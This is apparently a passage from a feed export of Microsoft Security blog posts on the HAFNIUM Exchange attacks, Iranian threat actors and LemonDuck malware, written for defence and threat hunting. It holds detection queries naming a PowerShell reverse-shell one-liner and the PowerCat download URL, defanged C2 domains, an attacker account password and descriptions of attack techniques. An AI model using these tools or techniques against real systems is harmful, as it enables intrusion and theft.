file](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/HAFNIUMUmServiceSuspiciousFile.yaml>)\n * [HAFNIUM New UM Service Child Process](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/HAFNIUMNewUMServiceChildProcess.yaml>)\n * [HAFNIUM Suspicious UM Service Errors](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/HAFNIUMSuspiciousIMServiceError.yaml>)\n * [HAFNIUM Suspicious File Downloads](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/htttp_proxy_oab_CL/HAFNIUMSuspiciousFileDownloads.yaml>)\n\n## Advanced hunting queries\n\nTo locate possible exploitation activity related to the contents of this blog, you can run the following [advanced hunting](<https://securitycenter.windows.com/hunting>) queries via Microsoft Defender for Endpoint and Azure Sentinel:\n\n### Microsoft Defender for Endpoint advanced hunting queries\n\nMicrosoft 365 Defender customers can find related hunting queries below or at this GitHub location: [https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/ ](<https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/>)\n\nAdditional queries and information are available via [_Threat Analytics portal_](<https://securitycenter.windows.com/threatanalytics3/>) for Microsoft Defender customers.\n\n**UMWorkerProcess.exe in Exchange creating abnormal content**\n\nLook for Microsoft Exchange Server\u2019s Unified Messaging service creating non-standard content on disk, which could indicate web shells or other malicious content, suggesting exploitation of CVE-2021-26858 vulnerability:\n\n`DeviceFileEvents | where InitiatingProcessFileName == \"UMWorkerProcess.exe\" | where FileName != \"CacheCleanup.bin\" | where FileName !endswith \".txt\" | where FileName !endswith \".LOG\" | where FileName !endswith \".cfg\" | where FileName != \"cleanup.bin\"`\n\n**UMWorkerProcess.exe spawning**\n\nLook for Microsoft Exchange Server\u2019s Unified Messaging service spawning abnormal subprocesses, suggesting exploitation of CVE-2021-26857 vulnerability:\n\n`DeviceProcessEvents | where InitiatingProcessFileName == \"UMWorkerProcess.exe\" | where FileName != \"wermgr.exe\" | where FileName != \"WerFault.exe\"`\n\nPlease note excessive spawning of wermgr.exe and WerFault.exe could be an indicator of compromise due to the service crashing during deserialization.\n\n### Azure Sentinel advanced hunting queries\n\nAzure Sentinel customers can find a Sentinel query containing these indicators in the Azure Sentinel Portal or at this GitHub location: <https://github.com/Azure/Azure-Sentinel/tree/master/Detections/MultipleDataSources/>.\n\nLook for Nishang Invoke-PowerShellTcpOneLine in Windows Event Logging:\n\n`SecurityEvent | where EventID == 4688 | where Process has_any (\"powershell.exe\", \"PowerShell_ISE.exe\") | where CommandLine has \"$client = New-Object System.Net.Sockets.TCPClient\"`\n\nLook for downloads of PowerCat in cmd and Powershell command line logging in Windows Event Logs:\n\n`SecurityEvent | where EventID == 4688 | where Process has_any (\"cmd.exe\", \"powershell.exe\", \"PowerShell_ISE.exe\") | where CommandLine has \"https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1\"`\n\nLook for Exchange PowerShell Snapin being loaded. This can be used to export mailbox data, subsequent command lines should be inspected to verify usage:\n\n`SecurityEvent | where EventID == 4688 | where Process has_any (\"cmd.exe\", \"powershell.exe\", \"PowerShell_ISE.exe\") | where isnotempty(CommandLine) | where CommandLine contains \"Add-PSSnapin Microsoft.Exchange.Powershell.Snapin\" | summarize FirstSeen = min(TimeGenerated), LastSeen = max(TimeGenerated) by Computer, Account, CommandLine`\n\n \n\nThe post [HAFNIUM targeting Exchange Servers with 0-day exploits](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-02T21:07:53", "type": "mmpc", "title": "HAFNIUM targeting Exchange Servers with 0-day exploits", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-02T21:07:53", "id": "MMPC:28641FE2F73292EB4B26994613CC882B", "href": "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-19T19:23:28", "description": "Over the past year, the Microsoft Threat Intelligence Center (MSTIC) has observed a gradual evolution of the tools, techniques, and procedures employed by malicious network operators based in Iran. At [CyberWarCon 2021](<https://www.cyberwarcon.com/>), MSTIC analysts presented their analysis of these trends in Iranian nation state actor activity during a session titled \u201c_The Iranian evolution: Observed changes in Iranian malicious network operations_\u201d. This blog is intended to summarize the content of that research and the topics covered in their presentation and demonstrate MSTIC\u2019s ongoing efforts to track these actors and protect customers from the related threats.\n\nMSTIC consistently tracks threat actor activity, including the groups discussed in this blog, and works across Microsoft Security products and services to build detections into our products that improve customer protections. We are sharing this blog today so that others in the community can also be aware of the latest techniques we have observed being used by Iranian actors.\n\nAs with any observed nation-state actor activity, Microsoft has directly notified customers that have been targeted or compromised, providing them with the information they need to help secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.\n\nThree notable trends in Iranian nation-state operators have emerged:\n\n * They are increasingly utilizing ransomware to either collect funds or disrupt their targets.\n * They are more patient and persistent while engaging with their targets.\n * While Iranian operators are more patient and persistent with their social engineering campaigns, they continue to employ aggressive brute force attacks on their targets.\n\n## Ransomware\n\nSince September 2020, MSTIC has observed six Iranian threat groups deploying ransomware to achieve their strategic objectives. These ransomware deployments were launched in waves every six to eight weeks on average.\n\n\n\n_Figure 1: Timeline of ransomware attacks by Iranian threat actors_\n\nIn one observed campaign, PHOSPHORUS targeted the Fortinet FortiOS SSL VPN and unpatched on-premises Exchange Servers globally with the intent of deploying ransomware on vulnerable networks. A recent blog post by the [DFIR Report](<https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/>) describes a similar intrusion in which actors leveraged vulnerabilities in on-premise Exchange Servers to compromise a victim environment and encrypt systems via BitLocker. MSTIC also attributes this activity to PHOSPHORUS. PHOSPHORUS operators conducted widespread scanning and ransomed targeted systems through a five-step process: Scan, Exploit, Review, Stage, Ransom.\n\n### Scan\n\nIn the early part of 2021, PHOSPHORUS actors scanned millions of IPs on the internet for Fortinet FortiOS SSL VPN that were vulnerable to [CVE-2018-13379](<https://www.fortiguard.com/psirt/FG-IR-18-384>). This vulnerability allowed the attackers to collect clear-text credentials from the sessions file on vulnerable Fortinet VPN appliances. The actors collected credentials from over 900 Fortinet VPN servers in the United States, Europe, and Israel so far this year. In the last half of 2021, PHOSPHORUS shifted to scanning for unpatched on-premises Exchange Servers vulnerable to ProxyShell ([CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>)).\n\n### Exploit\n\nWhen they identified vulnerable servers, PHOSPHORUS sought to gain persistence on the target systems. In some instances, the actors downloaded a Plink runner named _MicrosoftOutLookUpdater.exe_. This file would beacon periodically to their C2 servers via SSH, allowing the actors to issue further commands. Later, the actors would download a custom implant via a Base64-encoded PowerShell command. This implant established persistence on the victim system by modifying startup registry keys and ultimately functioned as a loader to download additional tools.\n\n### Review\n\nAfter gaining persistence, PHOSPHORUS actors triaged hundreds of victims to determine which of them were fitting for actions on objectives. On select victims, operators created local administrator accounts with a with a username of \u201chelp\u201d and password of \u201c_AS_@1394\u201d via the commands below. On occasion, actors dumped LSASS to acquire credentials to be used later for lateral movement.\n\n\n\n### Stage and Ransom\n\nFinally, MSTIC observed PHOSPHORUS employing BitLocker to encrypt data and ransom victims at several targeted organizations. BitLocker is a full volume encryption feature meant to be used for legitimate purposes. After compromising the initial server (through vulnerable VPN or Exchange Server), the actors moved laterally to a different system on the victim network to gain access to higher value resources. From there, they deployed a script to encrypt the drives on multiple systems. Victims were instructed to reach out to a specific Telegram page to pay for the decryption key.\n\n\n\n## Patience and persistence\n\nMSTIC has observed PHOSPHORUS threat actors employing social engineering to build rapport with their victims before targeting them. These operations likely required significant investment in the operator\u2019s time and resources to refine and execute. This trend indicates PHOSPHORUS is either moving away from or expanding on their past tactics of sending unsolicited links and attachments in spear-phishing email campaigns to attempt credential theft.\n\n### PHOSHORUS \u2013 Patient and persistent\n\nPHOSPHORUS sends \u201cinterview requests\u201d to target individuals through emails that contain tracking links to confirm whether the user has opened the file. Once a response is received from the target user, PHOSPHORUS attackers send a link to a benign list of interview questions hosted on a cloud service provider. The attackers continue with several back-and-forth conversations discussing the questions with the target user before finally sending a meeting invite with a link masquerading as a Google Meeting.\n\nOnce the meeting invite is sent, the attackers continuously reach out to the target user, asking them to test the Google Meeting link. The attackers contact the targeted user multiple times per day, continuously pestering them to click the link. The attackers even go so far as to offer to call the target user to walk them through clicking the link. The attackers are more than willing to troubleshoot any issues the user has signing into the fake Google Meeting link, which leads to a credential harvesting page.\n\nMSTIC has observed PHOSPHORUS operators become very aggressive in their emails after the initial lure is sent, to the point where they are almost demanding a response from the targeted user.\n\n### CURIUM \u2013 In it for the long run\n\nCURIUM is another Iranian threat actor group that has shown a great deal of patience when targeting users. Instead of phishing emails, CURIUM actors leverage a network of fictitious social media accounts to build trust with targets and deliver malware.\n\nThese attackers have followed the following playbook:\n\n * Masquerade as an attractive woman on social media\n * Establish a connection via social media with a target user via LinkedIn, Facebook, etc.\n * Chat with the target daily\n * Send benign videos of the woman to the target to prime them to lower their guard\n * Send malicious files to the target similar the benign files previously sent\n * Request that the target user open the malicious document\n * Exfiltrate data from the victim machine\n\nThe process above can take multiple months from the initial connection to the delivery of the malicious document. The attackers build a relationship with target users over time by having constant and continuous communications which allows them to build trust and confidence with the target. In many of the cases we have observed, the targets genuinely believed that they were making a human connection and not interacting with a threat actor operating from Iran.\n\nBy exercising patience, building relationships, and pestering targets continuously once a relationship has been formed, Iranian threat actors have had more success in compromising their targets.\n\n## Brute force\n\nIn 2021, MSTIC observed DEV-0343 aggressively targeting Office 365 tenants via an ongoing campaign of password spray attacks. DEV-0343 is a threat actor MSTIC assesses to be likely operating in support of Iranian interests. MSTIC has [blogged about DEV-0343 activity previously](<https://www.microsoft.com/security/blog/2021/10/11/iran-linked-dev-0343-targeting-defense-gis-and-maritime-sectors/>).\n\nAnalysis of Office 365 logs suggests that DEV-0343 is using a red team tool like [o365spray](<https://github.com/0xZDH/o365spray>) to conduct these attacks.\n\nTargeting in this DEV-0343 activity has been observed across defense companies that support United States, European Union, and Israeli government partners producing military-grade radars, drone technology, satellite systems, and emergency response communication systems. Further activity has targeted customers in geographic information systems (GIS), spatial analytics, regional ports of entry in the Persian Gulf, and several maritime and cargo transportation companies with a business focus in the Middle East.\n\nAs we discussed in our previous blog, DEV-0343 operators\u2019 \u2018pattern of life\u2019 is consistent with the working schedule of actors based in Iran. DEV-0343 operator activity peaked Sunday through Thursday between 04:00:00 and 16:00:00 UTC.\n\n\n\n_Figure 2: DEV-0343 observed operating hours in UTC_\n\n\n\n_Figure 3: DEV-0343 observed actor requests per day_\n\nKnown DEV-0343 operators have also been observed targeting the same account on the same tenant being targeted by other known Iranian operators. For example, EUROPIUM operators attempted to access a specific account on June 12, 2021 and ultimately gained access to this account on June 13, 2021. DEV-0343 was then observed targeting this same account within minutes of EUROPIUM operators gaining access to it the same day. MSTIC assesses that these observed overlapping activities suggest a coordination between different Iranian actors pursuing common objectives.\n\n## Closing thoughts: Increasingly capable threat actors\n\nAs Iranian operators have adapted both their strategic goals and tradecraft, over time they have evolved into more competent threat actors capable of conducting a full spectrum of operations including:\n\n * Information operations\n * Disruption and destruction\n * Support to physical operations\n\nSpecifically, Iranian operators have proven themselves to be both willing and able to:\n\n * Deploy ransomware\n * Deploy disk wipers\n * Deploy mobile malware\n * Conduct phishing attacks\n * Conduct password spray attacks\n * Conduct mass exploitation attacks\n * Conduct supply chain attacks\n * Cloak C2 communications behind legitimate cloud services\n\nMSTIC thanks CyberWarCon 2021 for the opportunity to present this research to the broader security community. Microsoft will continue to monitor all this activity by Iranian actors and implement protections for our customers.\n\n \n\nThe post [Evolving trends in Iranian threat actor activity \u2013 MSTIC presentation at CyberWarCon 2021](<https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-16T16:00:08", "type": "mmpc", "title": "Evolving trends in Iranian threat actor activity \u2013 MSTIC presentation at CyberWarCon 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-11-16T16:00:08", "id": "MMPC:C0F4687B18D53FB9596AD4FDF77092D8", "href": "https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-19T22:36:39", "description": "As cybercriminals continue to exploit unpatched on-premises versions of Exchange Server 2013, 2016, and 2019, we continue to actively work with customers and partners to help them secure their environments and respond to associated threats. To date, we have [released a comprehensive Security Update](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>), a one-click interim [Exchange On-Premises Mitigation Tool](<https://aka.ms/eomtrelease>) for both current and out-of-support versions of on-premises Exchange Servers, and [step-by-step guidance](<https://aka.ms/exchange-customer-guidance>) to help address these attacks.\n\nToday, we have taken an additional step to further support our customers who are still vulnerable and have not yet implemented the complete security update. With the latest security intelligence update, Microsoft Defender Antivirus and System Center Endpoint Protection will **automatically mitigate** CVE-2021-26855 on any vulnerable Exchange Server on which it is deployed. Customers do not need to take action beyond ensuring they have installed the latest security intelligence update (build **1.333.747.0** or newer), if they do not already have automatic updates turned on.\n\n\n\nThe Exchange security update is still the most comprehensive way to protect your servers from these attacks and others fixed in earlier releases. This interim mitigation is designed to help protect customers while they take the time to implement the latest Exchange Cumulative Update for their version of Exchange.\n\nMicrosoft will provide guidance to our security partners so that they have the option to make available similar, simple mitigations in their products as well.\n\nWe are deeply committed to protecting our customers. To stay up to date please continue to review the content posted at <https://aka.ms/exchangevulns>.\n\n### Frequently Asked Questions\n\n**Q: If I have Microsoft Defender Antivirus installed on my Exchange Server do I need to take any further action to get this mitigation?**\n\nA: Customers that install Microsoft Defender Antivirus and have automatic definition updates enabled (default setting) do not have to take further action to receive the mitigation.\n\n**Q: My organization manages Microsoft Defender Antivirus definition updates. What do I need to do to ensure I have this mitigation?**\n\nA: Customers that manage Microsoft Defender Antivirus definition updates need to select the new detection build (**1.333.747.0 or newer**) and deploy that to the Exchange Server.\n\n**Q: After this mitigation, do I still need to install the security update?**\n\nA: Yes. This automatic mitigation breaks the attack chain by mitigating CVE-2021-26855. Customers should still prioritize getting current on security updates for Exchange Server to comprehensively address the vulnerabilities.\n\n**Q: When does Microsoft Defender Antivirus apply the mitigation?**\n\nA: Microsoft Defender Antivirus will automatically identify if a vulnerable version of Exchange Server is installed and apply the mitigations the first time the security intelligence update is deployed. The mitigation is deployed once per machine.\n\n**Q: Is cloud protection required to receive the mitigation?**\n\nA: No. However, enabling cloud protection is a best practice that will keep you with the most current protections against the ever-changing threat environment. Customers are encouraged to enable cloud protection.\n\n**Q: What can I do if I don\u2019t have Microsoft Defender Antivirus?**\n\nA: Use the One-Click Microsoft Exchange On-Premises Mitigation Tool found [here](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n\nThe post [Automatic on-premises Exchange Server mitigation now in Microsoft Defender Antivirus](<https://www.microsoft.com/security/blog/2021/03/18/automatic-on-premises-exchange-server-mitigation-now-in-microsoft-defender-antivirus/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-18T22:00:47", "type": "mmpc", "title": "Automatic on-premises Exchange Server mitigation now in Microsoft Defender Antivirus", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-03-18T22:00:47", "id": "MMPC:FC03200E57A46D16A8CD1A5A0E647BB3", "href": "https://www.microsoft.com/security/blog/2021/03/18/automatic-on-premises-exchange-server-mitigation-now-in-microsoft-defender-antivirus/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-13T21:41:38", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) covered the evolution of the threat, how it spreads, and how it impacts organizations. Part 2 provides a deep dive on the attacker behavior and outlines investigation guidance.] _\n\nLemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. As we discussed in [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) of this blog series, in recent months LemonDuck adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns. After installation, LemonDuck can generally be identified by a predictable series of automated activities, followed by beacon check-in and monetization behaviors, and then, in some environments, human-operated actions.\n\nIn this blog post, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general and automatic behavior, as well as human-operated actions. We also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks.\n\n\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## External or human-initialized behavior\n\nLemonDuck activity initiated from external applications \u2013 as against self-spreading methods like malicious phishing mail \u2013 is generally much more likely to begin with or lead to human-operated activity. These activities always result in more invasive secondary malware being delivered in tandem with persistent access being maintained through backdoors. These human-operated activities result in greater impact than standard infections.\n\nIn March and April 2021, various vulnerabilities related to the [ProxyLogon](<https://security.microsoft.com/threatanalytics3/4ef1fbc5-5659-4d9b-b32e-97a694475955/overview>) set of Microsoft Exchange Server exploits were utilized by LemonDuck to install web shells and gain access to outdated systems. Attackers then used this access to launch additional attacks while also deploying automatic LemonDuck components and malware.\n\nIn some cases, the LemonDuck attackers used renamed copies of the official Microsoft Exchange On-Premises Mitigation Tool to remediate the vulnerability they had used to gain access. They did so while maintaining full access to compromised devices and limiting other actors from abusing the same Exchange vulnerabilities.\n\nThis self-patching behavior is in keeping with the attackers\u2019 general desire to remove competing malware and risks from the device. This allows them to limit visibility of the attack to SOC analysts within an organization who might be prioritizing unpatched devices for investigation, or who would overlook devices that do not have a high volume of malware present.\n\nThe LemonDuck operators also make use of many [fileless malware techniques](<https://www.microsoft.com/security/blog/2018/01/24/now-you-see-me-exposing-fileless-malware/#:~:text=%20These%20techniques%20include%3A%20%201%20Reflective%20DLL,provide%20powerful%20means%20for%20delivering%20memory-only...%20More%20>), which can make remediation more difficult. Fileless techniques, which include persistence via registry, scheduled tasks, WMI, and startup folder, remove the need for stable malware presence in the filesystem. These techniques also include utilizing process injection and in-memory execution, which can make removal non-trivial. It is therefore imperative that organizations that were vulnerable in the past also direct action to investigate exactly how patching occurred, and whether malicious activity persists.\n\nOn the basic side of implementation this can mean registry, scheduled task, WMI and startup folder persistence to remove the necessity for stable malware presence in the filesystem. However, many free or easily available RATs and Trojans are now routinely utilizing process injection and in-memory execution to circumvent easy removal. To rival these kinds of behaviors it\u2019s imperative that security teams within organizations review their incident response and malware removal processes to include all common areas and arenas of the operating system where malware may continue to reside after cleanup by an antivirus solution.\n\n## General, automatic behavior\n\nIf the initial execution begins automatically or from self-spreading methods, it typically originates from a file called _Readme.js_. This behavior could change over time, as the purpose of this .js file is to obfuscate and launch the PowerShell script that pulls additional scripts from the C2. This JavaScript launches a CMD process that subsequently launches Notepad as well as the PowerShell script contained within the JavaScript.\n\nIn contrast, if infection begins with RDP brute force, Exchange vulnerabilities, or other vulnerable edge systems, the first few actions are typically human-operated or originate from a hijacked process rather than from _Readme.js_. After this, the next few actions that the attackers take, including the scheduled task creation, as well as the individual components and scripts are generally the same.\n\nOne of these actions is to establish fileless persistence by creating scheduled tasks that re-run the initial PowerShell download script. This script pulls its various components from the C2s at regular intervals. The script then checks to see if any portions of the malware were removed and re-enables them. LemonDuck also maintains a backup persistence mechanism through WMI Event Consumers to perform the same actions.\n\nTo host their scripts, the attackers use multiple hosting sites, which as mentioned are resilient to takedown. They also have multiple scheduled tasks to try each site, as well as the WMI events in case other methods fail. If all of those fail, LemonDuck also uses its access methods such as RDP, Exchange web shells, Screen Connect, and RATs to maintain persistent access. These task names can vary over time, but \u201cblackball\u201d, \u201cblutea\u201d, and \u201crtsa\u201d have been persistent throughout 2020 and 2021 and are still seen in new infections as of this report.\n\nLemonDuck attempts to automatically disable Microsoft Defender for Endpoint real-time monitoring and adds whole disk drives \u2013 specifically the _C:\\_ drive \u2013 to the Microsoft Defender exclusion list. This action could in effect disable Microsoft Defender for Endpoint, freeing the attacker to perform other actions. [Tamper protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) prevents these actions, but it\u2019s important for organizations to monitor this behavior in cases where individual users set their own exclusion policy.\n\nLemonDuck then attempts to automatically remove a series of other security products through _CMD.exe_, leveraging _WMIC.exe_. The products that we have observed LemonDuck remove include ESET, Kaspersky, Avast, Norton Security, and MalwareBytes. However, they also attempt to uninstall any product with \u201cSecurity\u201d and \u201cAntiVirus\u201d in the name by running the following commands:\n\n\n\nCustom detections in Microsoft Defender for Endpoint or other security solutions can raise alerts on behaviors indicating interactions with security products that are not deployed in the environment. These alerts can allow the quick isolation of devices where this behavior is observed. While this uninstallation behavior is common in other malware, when observed in conjunction with other LemonDuck TTPs, this behavior can help validate LemonDuck infections.\n\nLemonDuck leverages a wide range of free and open-source penetration testing tools. It also uses freely available exploits and functionality such as coin mining. Because of this, the order and the number of times the next few activities are run can change. The attackers can also change the threat\u2019s presence slightly depending on the version, the method of infection, and timeframe. Many .exe and .bin files are downloaded from C2s via encoded PowerShell commands. These domains use a variety names such as the following:\n\n * ackng[.]com\n * bb3u9[.]com\n * ttr3p[.]com\n * zz3r0[.]com\n * sqlnetcat[.]com\n * netcatkit[.]com\n * hwqloan[.]com\n * 75[.]ag\n * js88[.]ag\n * qq8[.]ag\n\nIn addition to directly calling the C2s for downloads through scheduled tasks and PowerShell, LemonDuck exhibits another unique behavior: the IP addresses of a smaller subset of C2s are calculated and paired with a previously randomly generated and non-real domain name. This information is then added into the Windows Hosts file to avoid detection by static signatures. In instances where this method is seen, there is a routine to update this once every 24 hours. An example of this is below:\n\n\n\nLemonDuck is known to use custom executables and scripts. It also renames and packages well-known tools such as XMRig and Mimikatz. Of these, the three most common are the following, though other packages and binaries have been seen as well, including many with _.ori_ file extensions:\n\n * _IF.BIN _(used for lateral movement and privilege escalation)\n * _KR.BIN _(used for competition removal and host patching)\n * _M[0-9]{1}[A-Z]{1}.BIN, M6.BIN, M6.BIN.EXE, or M6G.Bin_ (used for mining)\n\nExecutables used throughout the infection also use random file names sourced from the initiating script, which selects random characters, as evident in the following code:\n\n\n\n## Lateral movement and privilege escalation\n\n_IF.Bin_, whose name stands for \u201cInfection\u201d, is the most common name used for the infection script during the download process. LemonDuck uses this script at installation and then repeatedly thereafter to attempt to scan for ports and perform network reconnaissance. It then attempts to log onto adjacent devices to push the initial LemonDuck execution scripts.\n\n_IF.Bin_ attempts to move laterally via any additional attached drives. When drives are identified, they are checked to ensure that they aren\u2019t already infected. If they aren\u2019t, a copy of _Readme.js_, as well as subcomponents of _IF.Bin_, are downloaded into the drive\u2019s home directory as hidden.\n\nSimilarly, _IF.Bin_ attempts to brute force and use vulnerabilities for SMB, SQL, and other services to move laterally. It then immediately contacts the C2 for downloads.\n\nAnother tool dropped and utilized within this lateral movement component is a bundled Mimikatz, within a _mimi.dat_ file associated with both the \u201cCat\u201d and \u201cDuck\u201d infrastructures. This tool\u2019s function is to facilitate credential theft for additional actions. In conjunction with credential theft, _IF.Bin_ drops additional .BIN files to attempt common service exploits like CVE-2017-8464 (LNK remote code execution vulnerability) to increase privilege.\n\nThe attackers regularly update the internal infection components that the malware scans for. They then attempt brute force or spray attacks, as well as exploits against available SSH, MSSQL, SMB, Exchange, RDP, REDIS and Hadoop YARN for Linux and Windows systems. A sample of ports that recent LemonDuck infections were observed querying include 70001, 8088, 16379, 6379, 22, 445, and 1433.\n\nOther functions built in and updated in this lateral movement component include mail self-spreading. This spreading functionality evaluates whether a compromised device has Outlook. If so, it accesses the mailbox and scans for all available contacts. It sends the initiating infecting file as part of a .zip, .js, or .doc/.rtf file with a static set of subjects and bodies. The mail metadata count of contacts is also sent to the attacker, likely to evaluate its effectiveness, such as in the following command:\n\n\n\n## Competition removal and host patching\n\nAt installation and repeatedly afterward, LemonDuck takes great lengths to remove all other botnets, miners, and competitor malware from the device. It does this via _KR.Bin_, the \u201cKiller\u201d script, which gets its name from its function calls. This script attempts to remove services, network connections, and other evidence from dozens of competitor malware via scheduled tasks. It also closes well-known mining ports and removes popular mining services to preserve system resources. The script even removes the mining service it intends to use and simply reinstalls it afterward with its own configuration.\n\nThis \u201cKiller\u201d script is likely a continuation of older scripts that were used by other botnets such as GhostMiner in 2018 and 2019. The older variants of the script were quite small in comparison, but they have since grown, with additional services added in 2020 and 2021. Presently, LemonDuck seems consistent in naming its variant _KR.Bin_. This process spares the scheduled tasks created by LemonDuck itself, including various PowerShell scripts as well as a task called \u201cblackball\u201d, \u201cblutea\u201d, or \u201crtsa\u201d, which has been in use by all LemonDuck\u2019s infrastructures for the last year along with other task names.\n\nThe attackers were also observed manually re-entering an environment, especially in instances where edge vulnerabilities were used as an initial entry vector. The attackers also patch the vulnerability they used to enter the network to prevent other attackers from gaining entry. As mentioned, the attackers were seen using a copy of a Microsoft-provided mitigation tool for Exchange ProxyLogon vulnerability, which they hosted on their infrastructure, to ensure other attackers don\u2019t gain web shell access the way they had. If unmonitored, this scenario could potentially lead to a situation where, if a system does not appear to be in an unpatched state, suspicious activity that occurred before patching could be ignored or thought to be unrelated to the vulnerability.\n\n## Weaponization and continued impact\n\nA miner implant is downloaded as part of the monetization mechanism of LemonDuck. The implant used is usually XMRig, which is a favorite of GhostMiner malware, the [Phorpiex 